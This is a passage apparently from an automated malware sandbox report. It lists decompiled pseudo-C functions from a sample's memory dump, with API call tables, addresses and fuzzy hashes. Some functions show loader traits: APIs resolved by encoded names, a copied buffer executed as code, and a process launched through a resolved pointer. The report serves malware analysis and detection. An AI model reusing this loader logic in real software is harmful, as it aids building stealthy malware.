                                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t116 =  *_t82(0,  &_v72);
                                                                                                                                                                                                                                                            				if(_t116 != 0) {
                                                                                                                                                                                                                                                            					goto L33;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				goto L6;
                                                                                                                                                                                                                                                            			}

































                                                                                                                                                                                                                                                            0x0487ada4
                                                                                                                                                                                                                                                            0x0487adba
                                                                                                                                                                                                                                                            0x0487adc0
                                                                                                                                                                                                                                                            0x0487adc2
                                                                                                                                                                                                                                                            0x0487adc7
                                                                                                                                                                                                                                                            0x0487adcd
                                                                                                                                                                                                                                                            0x0487add2
                                                                                                                                                                                                                                                            0x0487add5
                                                                                                                                                                                                                                                            0x0487ade3
                                                                                                                                                                                                                                                            0x0487adea
                                                                                                                                                                                                                                                            0x0487aded
                                                                                                                                                                                                                                                            0x0487adf0
                                                                                                                                                                                                                                                            0x0487adf1
                                                                                                                                                                                                                                                            0x0487adf4
                                                                                                                                                                                                                                                            0x0487adf7
                                                                                                                                                                                                                                                            0x0487adfa
                                                                                                                                                                                                                                                            0x0487adff
                                                                                                                                                                                                                                                            0x0487ae0e
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487ae14
                                                                                                                                                                                                                                                            0x0487ae1e
                                                                                                                                                                                                                                                            0x0487ae28
                                                                                                                                                                                                                                                            0x0487ae2d
                                                                                                                                                                                                                                                            0x0487ae2f
                                                                                                                                                                                                                                                            0x0487ae39
                                                                                                                                                                                                                                                            0x0487ae3c
                                                                                                                                                                                                                                                            0x0487ae3f
                                                                                                                                                                                                                                                            0x0487ae45
                                                                                                                                                                                                                                                            0x0487ae47
                                                                                                                                                                                                                                                            0x0487ae47
                                                                                                                                                                                                                                                            0x0487ae4a
                                                                                                                                                                                                                                                            0x0487ae4d
                                                                                                                                                                                                                                                            0x0487ae52
                                                                                                                                                                                                                                                            0x0487ae56
                                                                                                                                                                                                                                                            0x0487ae69
                                                                                                                                                                                                                                                            0x0487ae6b
                                                                                                                                                                                                                                                            0x0487af13
                                                                                                                                                                                                                                                            0x0487af13
                                                                                                                                                                                                                                                            0x0487af1a
                                                                                                                                                                                                                                                            0x0487af1d
                                                                                                                                                                                                                                                            0x0487af27
                                                                                                                                                                                                                                                            0x0487af27
                                                                                                                                                                                                                                                            0x0487af2b
                                                                                                                                                                                                                                                            0x0487afa9
                                                                                                                                                                                                                                                            0x0487afac
                                                                                                                                                                                                                                                            0x0487afae
                                                                                                                                                                                                                                                            0x0487afae
                                                                                                                                                                                                                                                            0x0487afb5
                                                                                                                                                                                                                                                            0x0487afb7
                                                                                                                                                                                                                                                            0x0487afc1
                                                                                                                                                                                                                                                            0x0487afc4
                                                                                                                                                                                                                                                            0x0487afc7
                                                                                                                                                                                                                                                            0x0487afc7
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487af2d
                                                                                                                                                                                                                                                            0x0487af30
                                                                                                                                                                                                                                                            0x0487af5e
                                                                                                                                                                                                                                                            0x0487af68
                                                                                                                                                                                                                                                            0x0487af6c
                                                                                                                                                                                                                                                            0x0487af74
                                                                                                                                                                                                                                                            0x0487af77
                                                                                                                                                                                                                                                            0x0487af7e
                                                                                                                                                                                                                                                            0x0487af88
                                                                                                                                                                                                                                                            0x0487af88
                                                                                                                                                                                                                                                            0x0487af8c
                                                                                                                                                                                                                                                            0x0487af91
                                                                                                                                                                                                                                                            0x0487afa0
                                                                                                                                                                                                                                                            0x0487afa6
                                                                                                                                                                                                                                                            0x0487afa6
                                                                                                                                                                                                                                                            0x0487af8c
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487af37
                                                                                                                                                                                                                                                            0x0487af3a
                                                                                                                                                                                                                                                            0x0487af42
                                                                                                                                                                                                                                                            0x0487af57
                                                                                                                                                                                                                                                            0x0487af5c
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487af5c
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487af42
                                                                                                                                                                                                                                                            0x0487af30
                                                                                                                                                                                                                                                            0x0487af2b
                                                                                                                                                                                                                                                            0x0487ae71
                                                                                                                                                                                                                                                            0x0487ae78
                                                                                                                                                                                                                                                            0x0487ae88
                                                                                                                                                                                                                                                            0x0487ae91
                                                                                                                                                                                                                                                            0x0487ae95
                                                                                                                                                                                                                                                            0x0487aed8
                                                                                                                                                                                                                                                            0x0487aee4
                                                                                                                                                                                                                                                            0x0487af0d
                                                                                                                                                                                                                                                            0x0487aee6
                                                                                                                                                                                                                                                            0x0487aeea
                                                                                                                                                                                                                                                            0x0487aef0
                                                                                                                                                                                                                                                            0x0487aef8
                                                                                                                                                                                                                                                            0x0487aefa
                                                                                                                                                                                                                                                            0x0487aefd
                                                                                                                                                                                                                                                            0x0487af03
                                                                                                                                                                                                                                                            0x0487af05
                                                                                                                                                                                                                                                            0x0487af05
                                                                                                                                                                                                                                                            0x0487aef8
                                                                                                                                                                                                                                                            0x0487aeea
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487aee4
                                                                                                                                                                                                                                                            0x0487ae9d
                                                                                                                                                                                                                                                            0x0487aea0
                                                                                                                                                                                                                                                            0x0487aea7
                                                                                                                                                                                                                                                            0x0487aeb7
                                                                                                                                                                                                                                                            0x0487aeba
                                                                                                                                                                                                                                                            0x0487aeca
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487aed0
                                                                                                                                                                                                                                                            0x0487aeb1
                                                                                                                                                                                                                                                            0x0487aeb5
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487aeb5
                                                                                                                                                                                                                                                            0x0487ae82
                                                                                                                                                                                                                                                            0x0487ae86
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487ae86
                                                                                                                                                                                                                                                            0x0487ae5f
                                                                                                                                                                                                                                                            0x0487ae63
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0487AE0E
                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 0487AE8B
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0487AE97
                                                                                                                                                                                                                                                            • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0487AECA
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                                                                                                                                                                                                                            • String ID: $
                                                                                                                                                                                                                                                            • API String ID: 948315288-3993045852
                                                                                                                                                                                                                                                            • Opcode ID: d4079bbcf67dbde16a85742b1851802106fa91f55b9d4176acd2eac7aed2d3d7
                                                                                                                                                                                                                                                            • Instruction ID: 23f69eff38b82342beeeac0ceeea6f2769fbbfde8fcc993336e71a9db5d9dd80
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4079bbcf67dbde16a85742b1851802106fa91f55b9d4176acd2eac7aed2d3d7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52814BB1A00205AFDB24DFA8D8A4BAEB7F5FF48310F108929E915E7240E774E945CB60
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 56%
                                                                                                                                                                                                                                                            			E04877620(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                            				intOrPtr _t42;
                                                                                                                                                                                                                                                            				intOrPtr _t44;
                                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                                                            				int _t49;
                                                                                                                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                                                                                                                            				WCHAR* _t56;
                                                                                                                                                                                                                                                            				void* _t57;
                                                                                                                                                                                                                                                            				int _t58;
                                                                                                                                                                                                                                                            				intOrPtr _t64;
                                                                                                                                                                                                                                                            				void* _t69;
                                                                                                                                                                                                                                                            				intOrPtr* _t73;
                                                                                                                                                                                                                                                            				void* _t74;
                                                                                                                                                                                                                                                            				intOrPtr _t75;
                                                                                                                                                                                                                                                            				intOrPtr _t79;
                                                                                                                                                                                                                                                            				intOrPtr* _t85;
                                                                                                                                                                                                                                                            				intOrPtr _t88;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t74 = __ecx;
                                                                                                                                                                                                                                                            				_t79 =  *0x487d33c; // 0x5259bb0
                                                                                                                                                                                                                                                            				_v20 = 8;
                                                                                                                                                                                                                                                            				_v16 = GetTickCount();
                                                                                                                                                                                                                                                            				_t42 = E048784D8(_t74,  &_v16);
                                                                                                                                                                                                                                                            				_v12 = _t42;
                                                                                                                                                                                                                                                            				if(_t42 == 0) {
                                                                                                                                                                                                                                                            					_v12 = 0x487c1ac;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t44 = E04879BE0(_t79);
                                                                                                                                                                                                                                                            				_v8 = _t44;
                                                                                                                                                                                                                                                            				if(_t44 != 0) {
                                                                                                                                                                                                                                                            					_t85 = __imp__;
                                                                                                                                                                                                                                                            					_t46 =  *_t85(_v12, _t69);
                                                                                                                                                                                                                                                            					_t47 =  *_t85(_v8);
                                                                                                                                                                                                                                                            					_t48 =  *_t85(_a4);
                                                                                                                                                                                                                                                            					_t49 = lstrlenW(_a8);
                                                                                                                                                                                                                                                            					_t53 = E048716F8(lstrlenW(0x487eb28) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0x487eb28) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
                                                                                                                                                                                                                                                            					_v16 = _t53;
                                                                                                                                                                                                                                                            					if(_t53 != 0) {
                                                                                                                                                                                                                                                            						_t75 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            						_t73 =  *0x487d11c; // 0x487abb4
                                                                                                                                                                                                                                                            						_t18 = _t75 + 0x487eb28; // 0x530025
                                                                                                                                                                                                                                                            						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
                                                                                                                                                                                                                                                            						_t56 =  *_t85(_v8);
                                                                                                                                                                                                                                                            						_a8 = _t56;
                                                                                                                                                                                                                                                            						_t57 =  *_t85(_a4);
                                                                                                                                                                                                                                                            						_t58 = lstrlenW(_a12);
                                                                                                                                                                                                                                                            						_t88 = E048716F8(lstrlenW(0x487ec48) + _a8 + _t57 + _t58 + lstrlenW(0x487ec48) + _a8 + _t57 + _t58 + 2);
                                                                                                                                                                                                                                                            						if(_t88 == 0) {
                                                                                                                                                                                                                                                            							E048770FF(_v16);
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							_t64 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            							_t31 = _t64 + 0x487ec48; // 0x73006d
                                                                                                                                                                                                                                                            							 *_t73(_t88, _t31, _a4, _v8, _a12);
                                                                                                                                                                                                                                                            							 *_a16 = _v16;
                                                                                                                                                                                                                                                            							_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                                                                            							 *_a20 = _t88;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					E048770FF(_v8);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _v20;
                                                                                                                                                                                                                                                            			}


























                                                                                                                                                                                                                                                            0x04877620
                                                                                                                                                                                                                                                            0x04877628
                                                                                                                                                                                                                                                            0x0487762e
                                                                                                                                                                                                                                                            0x0487763e
                                                                                                                                                                                                                                                            0x04877641
                                                                                                                                                                                                                                                            0x04877648
                                                                                                                                                                                                                                                            0x0487764b
                                                                                                                                                                                                                                                            0x0487764d
                                                                                                                                                                                                                                                            0x0487764d
                                                                                                                                                                                                                                                            0x04877656
                                                                                                                                                                                                                                                            0x0487765d
                                                                                                                                                                                                                                                            0x04877660
                                                                                                                                                                                                                                                            0x04877666
                                                                                                                                                                                                                                                            0x04877670
                                                                                                                                                                                                                                                            0x04877679
                                                                                                                                                                                                                                                            0x04877680
                                                                                                                                                                                                                                                            0x0487768e
                                                                                                                                                                                                                                                            0x048776a0
                                                                                                                                                                                                                                                            0x048776a7
                                                                                                                                                                                                                                                            0x048776aa
                                                                                                                                                                                                                                                            0x048776b3
                                                                                                                                                                                                                                                            0x048776bc
                                                                                                                                                                                                                                                            0x048776c5
                                                                                                                                                                                                                                                            0x048776d3
                                                                                                                                                                                                                                                            0x048776db
                                                                                                                                                                                                                                                            0x048776e0
                                                                                                                                                                                                                                                            0x048776e3
                                                                                                                                                                                                                                                            0x048776ee
                                                                                                                                                                                                                                                            0x04877705
                                                                                                                                                                                                                                                            0x04877709
                                                                                                                                                                                                                                                            0x0487773c
                                                                                                                                                                                                                                                            0x0487770b
                                                                                                                                                                                                                                                            0x0487770e
                                                                                                                                                                                                                                                            0x04877716
                                                                                                                                                                                                                                                            0x04877721
                                                                                                                                                                                                                                                            0x04877729
                                                                                                                                                                                                                                                            0x04877731
                                                                                                                                                                                                                                                            0x04877735
                                                                                                                                                                                                                                                            0x04877735
                                                                                                                                                                                                                                                            0x04877709
                                                                                                                                                                                                                                                            0x04877744
                                                                                                                                                                                                                                                            0x04877749
                                                                                                                                                                                                                                                            0x04877750

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 04877635
                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,80000002), ref: 04877670
                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 04877679
                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 04877680
                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(80000002), ref: 0487768E
                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(0487EB28), ref: 04877697
                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 048776DB
                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 048776E3
                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 048776EE
                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(0487EC48), ref: 048776F7
                                                                                                                                                                                                                                                              • Part of subcall function 048770FF: HeapFree.KERNEL32(00000000,00000000,04871545,00000000,?,?,00000000), ref: 0487710B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: lstrlen$CountFreeHeapTick
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2535036572-0
                                                                                                                                                                                                                                                            • Opcode ID: 9ac3a203127ab97ae80212630dd5ca9fc4f77f7b644a731a76c0859e5b8b0691
                                                                                                                                                                                                                                                            • Instruction ID: 7a86cd7b570f2884d6aa40c3e196ff70ca487354b91a10992145fb2cc88bf948
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ac3a203127ab97ae80212630dd5ca9fc4f77f7b644a731a76c0859e5b8b0691
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52319C72900109BFDF01AFA8CC5889E7FB9FF48358B058995E904E7220DB35EA11DF90
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 73%
                                                                                                                                                                                                                                                            			E0487731A(void* __eax, void* __ecx) {
                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                                            				long _v32;
                                                                                                                                                                                                                                                            				void _v104;
                                                                                                                                                                                                                                                            				char _v108;
                                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                                            				intOrPtr _t39;
                                                                                                                                                                                                                                                            				intOrPtr _t46;
                                                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                                                            				void* _t57;
                                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                                            				intOrPtr _t67;
                                                                                                                                                                                                                                                            				intOrPtr* _t68;
                                                                                                                                                                                                                                                            				intOrPtr* _t69;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t1 = __eax + 0x14; // 0x74183966
                                                                                                                                                                                                                                                            				_t67 =  *_t1;
                                                                                                                                                                                                                                                            				_t36 = E0487835C(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
                                                                                                                                                                                                                                                            				_v8 = _t36;
                                                                                                                                                                                                                                                            				if(_t36 != 0) {
                                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
                                                                                                                                                                                                                                                            				_t39 = _v12(_v12);
                                                                                                                                                                                                                                                            				_v8 = _t39;
                                                                                                                                                                                                                                                            				if(_t39 == 0 && ( *0x487d260 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                            					_v32 = 0;
                                                                                                                                                                                                                                                            					asm("stosd");
                                                                                                                                                                                                                                                            					asm("stosd");
                                                                                                                                                                                                                                                            					asm("stosd");
                                                                                                                                                                                                                                                            					_v108 = 0;
                                                                                                                                                                                                                                                            					memset( &_v104, 0, 0x40);
                                                                                                                                                                                                                                                            					_t46 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            					_t18 = _t46 + 0x487e3e6; // 0x73797325
                                                                                                                                                                                                                                                            					_t66 = E04874400(_t18);
                                                                                                                                                                                                                                                            					if(_t66 == 0) {
                                                                                                                                                                                                                                                            						_v8 = 8;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_t49 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            						_t19 = _t49 + 0x487e747; // 0x5258cef
                                                                                                                                                                                                                                                            						_t20 = _t49 + 0x487e0af; // 0x4e52454b
                                                                                                                                                                                                                                                            						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                                                                                                                                                                                                                            						if(_t69 == 0) {
                                                                                                                                                                                                                                                            							_v8 = 0x7f;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							_v108 = 0x44;
                                                                                                                                                                                                                                                            							E04872652();
                                                                                                                                                                                                                                                            							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                                                                                                                                                                                                                            							_push(1);
                                                                                                                                                                                                                                                            							E04872652();
                                                                                                                                                                                                                                                            							if(_t57 == 0) {
                                                                                                                                                                                                                                                            								_v8 = GetLastError();
                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                            								CloseHandle(_v28);
                                                                                                                                                                                                                                                            								CloseHandle(_v32);
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						HeapFree( *0x487d238, 0, _t66);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t68 = _v16;
                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
                                                                                                                                                                                                                                                            				E048770FF(_t68);
                                                                                                                                                                                                                                                            				goto L12;
                                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                                            0x04877322
                                                                                                                                                                                                                                                            0x04877322
                                                                                                                                                                                                                                                            0x04877331
                                                                                                                                                                                                                                                            0x0487733a
                                                                                                                                                                                                                                                            0x0487733d
                                                                                                                                                                                                                                                            0x0487744d
                                                                                                                                                                                                                                                            0x04877454
                                                                                                                                                                                                                                                            0x04877454
                                                                                                                                                                                                                                                            0x0487734c
                                                                                                                                                                                                                                                            0x04877357
                                                                                                                                                                                                                                                            0x0487735c
                                                                                                                                                                                                                                                            0x0487735f
                                                                                                                                                                                                                                                            0x04877374
                                                                                                                                                                                                                                                            0x0487737a
                                                                                                                                                                                                                                                            0x0487737b
                                                                                                                                                                                                                                                            0x0487737e
                                                                                                                                                                                                                                                            0x04877384
                                                                                                                                                                                                                                                            0x04877387
                                                                                                                                                                                                                                                            0x0487738c
                                                                                                                                                                                                                                                            0x04877394
                                                                                                                                                                                                                                                            0x048773a0
                                                                                                                                                                                                                                                            0x048773a4
                                                                                                                                                                                                                                                            0x04877434
                                                                                                                                                                                                                                                            0x048773aa
                                                                                                                                                                                                                                                            0x048773aa
                                                                                                                                                                                                                                                            0x048773af
                                                                                                                                                                                                                                                            0x048773b6
                                                                                                                                                                                                                                                            0x048773ca
                                                                                                                                                                                                                                                            0x048773ce
                                                                                                                                                                                                                                                            0x0487741d
                                                                                                                                                                                                                                                            0x048773d0
                                                                                                                                                                                                                                                            0x048773d1
                                                                                                                                                                                                                                                            0x048773d8
                                                                                                                                                                                                                                                            0x048773f1
                                                                                                                                                                                                                                                            0x048773f3
                                                                                                                                                                                                                                                            0x048773f7
                                                                                                                                                                                                                                                            0x048773fe
                                                                                                                                                                                                                                                            0x04877418
                                                                                                                                                                                                                                                            0x04877400
                                                                                                                                                                                                                                                            0x04877409
                                                                                                                                                                                                                                                            0x0487740e
                                                                                                                                                                                                                                                            0x0487740e
                                                                                                                                                                                                                                                            0x048773fe
                                                                                                                                                                                                                                                            0x0487742c
                                                                                                                                                                                                                                                            0x0487742c
                                                                                                                                                                                                                                                            0x048773a4
                                                                                                                                                                                                                                                            0x0487743b
                                                                                                                                                                                                                                                            0x04877444
                                                                                                                                                                                                                                                            0x04877448
                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 0487835C: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04877336,?,00000001,?,?,00000000,00000000), ref: 04878381
                                                                                                                                                                                                                                                              • Part of subcall function 0487835C: GetProcAddress.KERNEL32(00000000,7243775A), ref: 048783A3
                                                                                                                                                                                                                                                              • Part of subcall function 0487835C: GetProcAddress.KERNEL32(00000000,614D775A), ref: 048783B9
                                                                                                                                                                                                                                                              • Part of subcall function 0487835C: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 048783CF
                                                                                                                                                                                                                                                              • Part of subcall function 0487835C: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 048783E5
                                                                                                                                                                                                                                                              • Part of subcall function 0487835C: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 048783FB
                                                                                                                                                                                                                                                            • memcpy.NTDLL(00000001,?,?,?,00000001,?,?,00000000,00000000), ref: 0487734C
                                                                                                                                                                                                                                                            • memset.NTDLL ref: 04877387
                                                                                                                                                                                                                                                              • Part of subcall function 04874400: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,048791A4,63699BCE,04877B28,73797325), ref: 04874411
                                                                                                                                                                                                                                                              • Part of subcall function 04874400: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0487442B
                                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(4E52454B,05258CEF,73797325), ref: 048773BD
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 048773C4
                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0487742C
                                                                                                                                                                                                                                                              • Part of subcall function 04872652: GetProcAddress.KERNEL32(36776F57,048722B1), ref: 0487266D
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000001), ref: 04877409
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0487740E
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000001), ref: 04877412
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 478747673-0
                                                                                                                                                                                                                                                            • Opcode ID: ece495beea0b0d46900030514f4de868e6391a5cb3e90f6a43b20a022d721dd7
                                                                                                                                                                                                                                                            • Instruction ID: 922ae2e6a9bf15026b4c5eccc7c584b1aaa16ce414f577432d9d869c141b099b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ece495beea0b0d46900030514f4de868e6391a5cb3e90f6a43b20a022d721dd7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC310EB2900208AFDB10AFA8DC98D9EBBB9EF04348F044D65E609E7111D775FD45DB91
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 63%
                                                                                                                                                                                                                                                            			E04876AB0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                            				intOrPtr _t9;
                                                                                                                                                                                                                                                            				intOrPtr _t13;
                                                                                                                                                                                                                                                            				char* _t28;
                                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                                            				char* _t36;
                                                                                                                                                                                                                                                            				intOrPtr* _t40;
                                                                                                                                                                                                                                                            				char* _t41;
                                                                                                                                                                                                                                                            				char* _t42;
                                                                                                                                                                                                                                                            				char* _t43;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t34 = __edx;
                                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                                            				_t9 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            				_t1 = _t9 + 0x487e62c; // 0x253d7325
                                                                                                                                                                                                                                                            				_t36 = 0;
                                                                                                                                                                                                                                                            				_t28 = E048721F1(__ecx, _t1);
                                                                                                                                                                                                                                                            				if(_t28 != 0) {
                                                                                                                                                                                                                                                            					_t40 = __imp__;
                                                                                                                                                                                                                                                            					_t13 =  *_t40(_t28);
                                                                                                                                                                                                                                                            					_v8 = _t13;
                                                                                                                                                                                                                                                            					_t41 = E048716F8(_v8 +  *_t40(_a4) + 1);
                                                                                                                                                                                                                                                            					if(_t41 != 0) {
                                                                                                                                                                                                                                                            						strcpy(_t41, _t28);
                                                                                                                                                                                                                                                            						_pop(_t33);
                                                                                                                                                                                                                                                            						__imp__(_t41, _a4);
                                                                                                                                                                                                                                                            						_t36 = E04879F9B(_t34, _t41, _a8);
                                                                                                                                                                                                                                                            						E048770FF(_t41);
                                                                                                                                                                                                                                                            						_t42 = E048744D9(StrTrimA(_t36, "="), _t36);
                                                                                                                                                                                                                                                            						if(_t42 != 0) {
                                                                                                                                                                                                                                                            							E048770FF(_t36);
                                                                                                                                                                                                                                                            							_t36 = _t42;
                                                                                                                                                                                                                                                            						}
